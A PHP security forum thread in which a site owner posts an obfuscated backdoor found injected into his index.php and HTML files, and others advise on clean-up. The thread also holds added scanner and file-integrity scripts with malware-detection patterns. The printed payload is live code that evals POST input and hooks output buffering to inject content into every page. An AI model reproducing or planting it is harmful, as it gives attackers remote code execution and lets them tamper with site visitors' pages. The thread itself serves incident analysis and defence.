Hack threat advice

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


kendall
Forum Regular
Posts: 852
Joined: Tue Jul 30, 2002 10:21 am
Location: Trinidad, West Indies

Hack threat advice

Post by kendall »

This seems to be what is showing up in my logs... I'm trying to get a handle on what its intentions were.

Code:

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#['"][^\s'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This seems to be what the hacker is putting in my index.php and HTML files, along with an "<iframe" link....

OK, I'm not running any CMS software, and I have changed my FTP and made adjustments to my php.ini file... yet other sites of mine are being attacked and hacked as I speak... Is there anything that I should be looking for in my code to help pinpoint a hole and stop it?
Last edited by Benjamin on Wed May 13, 2009 12:59 pm, edited 1 time in total.
Reason: Changed [quote] to [code=php]
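The snippet kendall posted has a recognisable shape: it evaluates POST input, unpacks a long base64_decode() literal, decompresses gzip output with gzinflate(), chains itself into set_error_handler(), and installs its own ob_start() callback so it can splice content into every page on the way out. The following scanner is an added example written for this thread, not code from the original post or from any project: it walks a directory for files carrying those traits (plus any <iframe> in HTML, which kendall also saw), and checks the running PHP process for a non-default output handler or a foreign error handler. All function names are hypothetical, and the sample files and the example.invalid host are constructed for the demo.

```php
<?php
// Added example, not code from the thread. Read-only indicator scan for the
// traits of the posted payload, plus a runtime check for an already-loaded copy.
// Function names are hypothetical; sample files below are constructed.

const INDICATORS = [
    'eval_post'     => '/\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b/i',
    'base64_blob'   => '/base64_decode\s*\(\s*[\'"][A-Za-z0-9+\/=]{40,}[\'"]\s*\)/',
    'gzinflate'     => '/\bgzinflate\s*\(/i',
    'ob_handler'    => '/\bob_start\s*\(\s*[\'"]\w+[\'"]\s*\)/i',
    'error_handler' => '/\bset_error_handler\s*\(\s*[\'"]\w+[\'"]\s*\)/i',
    'iframe'        => '/<iframe\b/i',
];

// Return the names of every indicator that matches the given file contents.
function scan_source(string $source): array
{
    $hits = [];
    foreach (INDICATORS as $name => $pattern) {
        if (preg_match($pattern, $source) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Walk $root and map each suspicious file path to its matched indicators.
function scan_tree(string $root, array $extensions = ['php', 'html', 'htm', 'js']): array
{
    $findings = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || !in_array(strtolower($file->getExtension()), $extensions, true)) {
            continue;
        }
        $source = file_get_contents($file->getPathname());
        if ($source !== false && ($hits = scan_source($source)) !== []) {
            $findings[$file->getPathname()] = $hits;
        }
    }
    ksort($findings);
    return $findings;
}

// Runtime check: the payload registers its own output-buffer callback and
// chains into the error handler. On a clean request only handlers your own
// code registered should show up here.
function runtime_hooks(): array
{
    $handlers = [];
    foreach (ob_get_status(true) as $level) {
        if ($level['name'] !== 'default output handler') {
            $handlers[] = $level['name'];
        }
    }
    $errorHandler = set_error_handler(null); // returns the previously set handler, or null
    restore_error_handler();
    return ['output_handlers' => $handlers, 'error_handler' => $errorHandler];
}

// Demo on constructed samples in a scratch directory.
$dir = sys_get_temp_dir() . '/indicator_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/clean.php", "<?php echo 'hello'; ?>\n");
file_put_contents("$dir/infected.php",
    "<?php if(isset(\$_POST['t']))eval(\$_POST['t']);"
    . "define('T',base64_decode('" . str_repeat('QUJD', 12) . "'));"
    . "ob_start('tmp_handler'); ?>\n");
file_put_contents("$dir/index.html",
    "<html><body><iframe src=\"http://example.invalid/\" width=0 height=0></iframe></body></html>\n");

foreach (scan_tree($dir) as $path => $hits) {
    echo basename($path), ': ', implode(', ', $hits), "\n";
}
$hooks = runtime_hooks();
echo 'output handlers: ', implode(', ', $hooks['output_handlers']) ?: '(none)', "\n";
echo 'error handler set: ', $hooks['error_handler'] === null ? 'no' : 'yes', "\n";

array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

Run it against a copy of the webroot rather than the live files, and treat a hit as a reason to read the file, not as proof: base64_decode() and ob_start() have legitimate uses, and a site that embeds iframes on purpose will want that indicator tuned. The runtime check only helps if it runs inside the same PHP request path the payload hooks, for instance from a small script included early by the site's own bootstrap.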
crazycoders
Forum Contributor
Posts: 260
Joined: Tue Oct 28, 2008 7:48 am
Location: Montreal, Qc, Canada

Re: Hack threat advice

Post by crazycoders »

Well, he is definitely trying to inject some HTML/SCRIPT code into your page to do what... I'm not sure... If it's only one use, there is no risk, he'll be hacking himself at worst. Maybe he's trying to find vulnerabilities in your code...
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: Hack threat advice

Post by kaisellgren »

You said you are not using CMSs, okay. Are you using any PHP scripts? Are all your websites on the same server? This guy probably got into your server through a vulnerability in an application and now has access to your server.

First, you would need to update all scripts you have there to the latest versions. If there are no updates for some scripts, do a Google search for vulnerabilities that may exist in the version you have. Eliminate all unnecessary scripts and junk, and after that reset everything back to normal and especially change all salts, passwords, etc. before putting your sites public again.

And yes, this means you have to change all FTP credentials, hosting control panel credentials, etc.
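The clean-up sequence above (update, strip out unused scripts, reset, rotate every credential) leaves one open question: how do you know the site stays clean afterwards, given that kendall's other sites were being re-infected while the thread was running? A file-integrity baseline answers that. The script below is an added example, not code from this thread or from any project: it hashes every file under a webroot into a manifest taken right after the reset, then reports files that were added, modified or removed on the next run. A hit on index.php or an .html file shortly after the reset means the hole is still open. Function names are hypothetical, and the webroot, its files and the example.invalid host are constructed for the demo.

```php
<?php
// Added example, not code from the thread. File-integrity baseline for a
// webroot: build a SHA-256 manifest after the clean-up, then diff against it.
// Function names are hypothetical; the demo webroot and tampering are constructed.

// Map each file path (relative to $root) to its SHA-256 digest.
function build_manifest(string $root): array
{
    $manifest = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $relative = substr($file->getPathname(), strlen(rtrim($root, '/')) + 1);
        $manifest[$relative] = hash_file('sha256', $file->getPathname());
    }
    ksort($manifest);
    return $manifest;
}

// Report what changed between the stored baseline and the current tree.
function compare_manifest(array $baseline, array $current): array
{
    $diff = ['added' => [], 'modified' => [], 'removed' => []];
    foreach ($current as $path => $hash) {
        if (!isset($baseline[$path])) {
            $diff['added'][] = $path;
        } elseif (!hash_equals($baseline[$path], $hash)) {
            $diff['modified'][] = $path;
        }
    }
    foreach (array_keys($baseline) as $path) {
        if (!isset($current[$path])) {
            $diff['removed'][] = $path;
        }
    }
    return $diff;
}

function save_manifest(array $manifest, string $file): void
{
    file_put_contents($file, json_encode($manifest, JSON_PRETTY_PRINT));
}

function load_manifest(string $file): array
{
    return json_decode((string) file_get_contents($file), true) ?? [];
}

// Demo with a constructed webroot in a scratch directory.
$root = sys_get_temp_dir() . '/webroot_demo_' . getmypid();
$manifestFile = $root . '.manifest.json'; // keep the real one outside the webroot
mkdir($root);
file_put_contents("$root/index.php", "<?php echo 'site'; ?>\n");
file_put_contents("$root/about.html", "<html><body>About</body></html>\n");

// 1. Baseline taken immediately after the reset described in the thread.
save_manifest(build_manifest($root), $manifestFile);

// 2. Constructed tampering, mirroring what kendall saw: an <iframe> appended
//    to a page and a new file dropped next to it.
file_put_contents("$root/about.html", "<iframe src=\"http://example.invalid/\"></iframe>\n", FILE_APPEND);
file_put_contents("$root/tmp_dropper.php", "<?php // constructed placeholder ?>\n");

// 3. Re-scan and compare; about.html shows up as modified, tmp_dropper.php as added.
$diff = compare_manifest(load_manifest($manifestFile), build_manifest($root));
foreach ($diff as $kind => $paths) {
    echo $kind, ': ', $paths ? implode(', ', $paths) : '(none)', "\n";
}

array_map('unlink', glob("$root/*"));
rmdir($root);
unlink($manifestFile);
```

Store the manifest, and the script itself, somewhere the web server's user cannot write, otherwise whoever can drop files into the webroot can also rewrite the baseline. Run the comparison from cron after each deployment; on a static site that nobody has touched, anything other than three "(none)" lines is worth investigating, and the timestamp of the first change narrows down which log lines to read.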